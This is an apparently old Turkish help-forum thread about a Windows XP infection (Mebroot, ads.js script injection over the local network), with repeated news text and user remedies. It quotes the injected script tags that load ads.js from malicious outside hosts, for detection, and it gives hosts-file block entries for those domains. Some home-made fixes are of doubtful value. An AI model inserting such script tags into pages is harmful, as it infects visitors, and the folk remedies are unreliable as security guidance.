SMALL.JS ADS.JS g.asdafdgfgf.com mebroot

6630cu sormuş:

yada small.js adlı dosya nod32
tarafından virüs olarak görülüyor ayrıca bütün girilen sayfaların kaynak kodlarında jscriptle bu sayfaya yönlendirme var
1 Ben rootkit diyerek xp cdsi ile fixmbr komutu kullandım gerçektende mbr nin bozuk veya  geçersiz olduğu söyleniyordu
ama resetten sonra tekrar fixmbr çalıştırınca hala aynıydı.
2 Ağ yazıcı paylaşını iptal ettim
ama virüs temizlendimi bilemiyorum şimdilik ses yok gibi
Bu virüs /trojan /rootkit midir nedir nasıl temizlenir ?

Soru Türü: Yazılım
İşletim Sistemi: Windows XP
Sistem Özellikleri:
celeron 1700
xp sp2

İnternet Tarayıcı: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; IEMB3)

bu virüs

Virüs programının, tespit edilmesi zor biçimde kendisini Windows#65533;un içinde gizlemesi dolayısıyla çok tehlikeli olduğunu belirten uzmanlar, bu zararlı programın, sistem dosyalarını değiştirerek dışardan erişime olanak sağlayan ve kendisini gizleyen #65533;rootkit#65533; programcıkları gibi çalıştığını ve kendisini bilgisayarın Master Boot Record (MBR) adı verilen sabit diski üzerine yazdığını kaydediyorlar.

Symantec bilgisayar güvenliği şirketi yetkilileri, Mebroot olarak adlandırılan virüs bir kez kurulduktan sonra çoğunlukla, #65533;keyloggers#65533; adı verilen ve gizli bilgilerin çalınması için klavye vuruşlarını kaydeden programlar gibi diğer zararlı yazılımları da bilgisayara indirdiği uyarısında bulunuyor.

Şimdiye dek 200 binden fazla sisteme bulaşan virüs programlarını hazırlayan ve banka şifre bilgilerini çalmakta uzmanlaşmış bir Rus hacker grubu tarafından yazılan Mebroot virüsünün ilk olarak ekimde ortaya çıkarıldığını belirten uzmanlar, bu virüsle saldırıların geçen ay başında arttığına dikkat çekiyorlar.

Normalde bilgisayar çalışırken kaldırılamayan Mebroot virüsünü tarayarak tespit eden ve kaldırabilen bir yazılımın ise bağımsız bilgisayar güvenliği şirketi GMER tarafından geliştirildiği belirtiliyor.

Kasperin son ve lisanslı sürümünü kullanıyorum. Ancak "Allov" ve "Deny" seçeneklerinden başka bir seçenek sunamıyor. Yani Delete, Naturalize seçenekleri aktif değil.

Bu virus benimde başımın belası. Tam oh be şu Alman.nab 'dan kurtulduk derken şimdide bu çıktı, neler oluyor bilmiyorum ama ya antivirus şirketleri şu sıralar pasif kaldı ya da gene aynı şirketler bu virusleri yaymaktan çekinmiyor!

Bu virusle ilgili lütfen bilgisi olan kardeşler esirgemesin.
Teşekkürler.

güvenli kipte şu 3 programla taratın..
Avira Antivir
Ad-aware 2007
Sophos anti-rootkit

Arkadaşlar bırakın virüsü antivirüsü bunlar boş adamlar korumaya karşı korumalı virüs geliştirmiş. Ben kendi mantığımla bie yol izledim ve sanırım sorunu çözdüm bunu sizinlede paylaşmak istedim.

Bu virüs C:\ dizinine 2 adet dosya bırakıyor.
MicroSoft.vbs ve  MicroSoft.Bat dosyaları ben bunları defalarca sildim ama yerine yenileri geldi ve silmekten vazgeçtim. Bu dosyaları Not Defteri ile açtım ve içerisinde çağırdığı komutların isimlerini değiştirip kayıt ettim.

Mesela: Microsoft.Bat dosyası içinde yazan

cmd.exe /c C:\MicroSoft.pif
cmd.exe /c C:\MicroSoft54564545.pif diye değiştirdim. ve Şimdilik sorun görünmüyor.

İşallah işinize yarar bende yaradı detaylı bilgi almak isteyen arkadaşlarım MSN adresimi kullanabilirler. admin@yirmiyedi.net

Bende de aynı sorun vardı. İnternette biraz araştırma yaptım bu yazıyı buldum.

Son zamanların (Ekim 2007’den beri) en baş belası virüsü (g.asdafdgfgf.com / u.asdafdgfgf.com / hk.www404.cn:53/ads.js) ile ilgili bilgiler burada verilecek ve çözüm önerisi üzerinde durulacaktır. Bu virüs; aynı modeme bağlı olan bütün bilgisayarlarda etkili olmakta ve bilgisayarda çok büyük bir açık meydana getirmektedir. Bu virüsün özelliği, bilgisayarınızda virüs programı olsun olmasın, her hal ü karda bilgisayarınızı etkilemesidir. Ağ üzerinde sadece bir bilgisayarda virüsün bulunması yetmekte ve yüzlerce bilgisayar bu virüsten dolayı güvenlikten uzak bir hale gelmektedir.

Malware .js ve .c dilinde yazılmış bu worm’ların bu sene (2008) internetin korkulu rüyası olacağı ifade edilmektedir. Herhangi bir antivirüs veya anti spy programları bu virüsü çözemiyor. Bu yazılım, şimdiye kadar görülen en etkili kurtçuklardan biridir. Ağ üzerinden yayılıyor, bir javascript ile kendini explorer'a gömüyor. Bu virüsün en önemli özelliklerinden birisi, pc'yi herhangi bir virüs programıyla tarattığımızda herhangi bir virüse rastlanmamasıdır.

Virüs programının, tespit edilmesi zor; kendisini Windows’un içinde gizlemesi dolayısıyla çok tehlikeli olduğunu belirten uzmanlar, bu zararlı programın, sistem dosyalarını değiştirerek dışardan erişime olanak sağlayan ve kendisini gizleyen “rootkit” programcıkları gibi çalıştığını ve kendisini bilgisayarın Master Boot Record (MBR) adı verilen sabit diski üzerine yazdığını kaydediyorlar.

Symantec bilgisayar güvenliği şirketi yetkilileri, Mebroot olarak adlandırılan virüs bir kez kurulduktan sonra çoğunlukla, “keyloggers” adı verilen ve gizli bilgilerin çalınması için klavye vuruşlarını kaydeden programlar gibi diğer zararlı yazılımları da bilgisayara indirdiği uyarısında bulunuyor.

Şimdiye dek 200 binden fazla sisteme bulaşan virüs programlarını hazırlayan ve banka şifre bilgilerini çalmakta uzmanlaşmış Rus hacker grubu tarafından (Rus hackerlerin yaptığı tahmin edilmekle birlikte, Tayland ya da Çin’den yayıldığı da belirtilmektedir) yazılan virüsün ilk olarak ekimde ortaya çıktığını belirten uzmanlar, bu virüsle saldırıların geçen ay başında arttığına dikkat çekiyorlar.

   İŞTE VİRÜSÜ ANLAMANIN EN ETKİN YOLU!!!   

Bu virüsün etkin olduğunu anlamanın yolu;
Internet Explorer tarayıcıda Görünüm sekmesi altındaki KAYNAK,
Firefox tarayıcıda Görünüm linki altında SAYFA KAYNAĞINI GÖSTER,
Netscape tarayıcıda Görünüm veya View linki altında PAGE SOURGE veya SAYFA KAYNAĞI linkine basıp en üstte;

Kod:<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

<SCRIPT LANGUAGE="javascript1.2" SRC="http://222360.com/ads.js"></SCRIPT>

<SCRIPT LANGUAGE="javascript" SRC="http://hk.www404.cn:53/ads.js"></SCRIPT

biçiminde bir kodun olup olmadığını kontrol etmektir.

Eğer, buna benzer bir Script kodu en üstte yer alıyorsa, bilgisayarınızda yaptığınız bütün işlemlerde açık kapı bırakılmış olmakta ve istenilmesi halinde bütün bilgilerinize ulaşılabilinmektedir. Özellikle bankacılık işlemlerinin yapıldığı bilgisayarlar, belki de bu işten en çok zarar göreceklerden birisidir.

Adı geçen script kodunun en önemli yanlarından birisi de; web sitesindeki javascript dosyasını açmaya çalışması ve bu arada bilgisayar ve internet hızının büyük oranda düşmesidir. Virüs sadece yukarıdaki kodu, girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyor.

Adı geçen virüs sayfa yapısını alt üst etmekte ve özellikle safyadaki yazıların sadece bazılarını aşırı büyütmekte ve sayfa bazen tanınmayacak hale gelmektedir. Sitenin sağ ve sol tarafındaki menüleri aşağı kaymakta ve sayfa aşağıya doğru doğal olarak uzanmaktadır.

   İŞTE VİRÜSÜN ÇÖZÜM YOLU!!!   

Bazı bilgisayarlar aşağıdaki 1. yöntemi kullanarak çözüm bulabilseler de, bu şekilde çözüme kavuşan bilgisayar sayısı yok denecek kadar azdır. İlk denenmesi gereken yol şöyledir:

C:Windows\System32\Drivers\Etc altındaki HOST dosyasını not defteri ile açıp en alta şu satırları eklemek:

Kod:127.0.0.1 union.222360.com

127.0.0.1 www.union.222360.com

127.0.0.1 k.222360.com

127.0.0.1 www.k.222360.com

127.0.0.1 s.222360.com

127.0.0.1 v.222360.com

127.0.0.1 asdafdgfgf.com

127.0.0.1 www.asdafdgfgf.com

127.0.0.1 g.asdafdgfgf.com

127.0.0.1 www.g.asdafdgfgf.com

127.0.0.1 hk.www404.cn

Düzenleyip kaydedildikten sonra bilgisayar yeniden başladığında, yine de virüs ektin ise o zaman yapılacak tek şey kalıyor: 2. yöntemi denemek, yani Anti ARP programını kurmak. Bu programı kullanıp da virüsün engellenmediğini belirten kişiye şu ana kadar rastlanmamıştır.

ANTİ-ARP diye aratırsanız google'dan çok rahat bir şekilde bulabilirsiniz. Yanlız program trial olduğu için 15 günde bir silip yüklemeniz gerekiyor.

Not: ALINTIDIR